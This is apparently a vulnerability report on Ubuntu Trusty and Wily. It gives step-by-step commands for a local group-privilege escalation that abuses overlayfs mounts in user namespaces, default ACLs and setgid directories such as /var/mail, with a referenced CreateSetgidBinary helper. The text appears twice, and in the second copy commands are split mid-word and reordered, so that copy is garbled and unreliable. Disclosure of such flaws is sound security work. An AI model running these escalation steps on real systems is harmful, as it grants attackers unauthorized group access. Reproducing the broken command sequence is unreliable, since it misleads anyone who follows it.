On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to gain group privileges of arbitrary groups that created directories with properties to be found using "find / -perm -02020", e.g.
/usr/local/lib/python3.4 root.staff /var/lib/libuuid libuuid.libuuid /var/local root.staff /var/mail root.mail
For Ubuntu Trusty, following sequence can be used to reproduce the problem:
* In user/mount namespace:
rm -rf Mnt Test mkdir Mnt Test mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt
* Outside namespace
setfacl -m d:u:[your unpriv uid]:rwx Test
* Inside:
chmod 02777 Mnt/mail umount Mnt
* Outside:
~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg Test/mail/escalate ~/ReportUidGidCwd
For Ubuntu Wily:
mkdir Mnt Test Work mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt
setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work
CreateSetgidBinary is from http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to gain group privileges of arbitrary groups that created directories with properties to be found using "find / -perm -02020", e.g.
/usr/local/ lib/python3. 4 root.staff
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail
For Ubuntu Trusty, following sequence can be used to reproduce the problem:
* In user/mount namespace:
rm -rf Mnt Test /var,upperdir= Test overlayfs Mnt
mkdir Mnt Test
mount -t overlayfs -o lowerdir=
* Outside namespace
setfacl -m d:u:[your unpriv uid]:rwx Test
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidB inary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd
For Ubuntu Wily:
* Inside:
mkdir Mnt Test Work /var,upperdir= Test,workdir= Work overlayfs Mnt
mount -t overlayfs -o lowerdir=
* Outside:
setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidB inary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd
CreateSetgidBinary is from http:// www.halfdog. net/Security/ 2015/SetgidDire ctoryPrivilegeE scalation/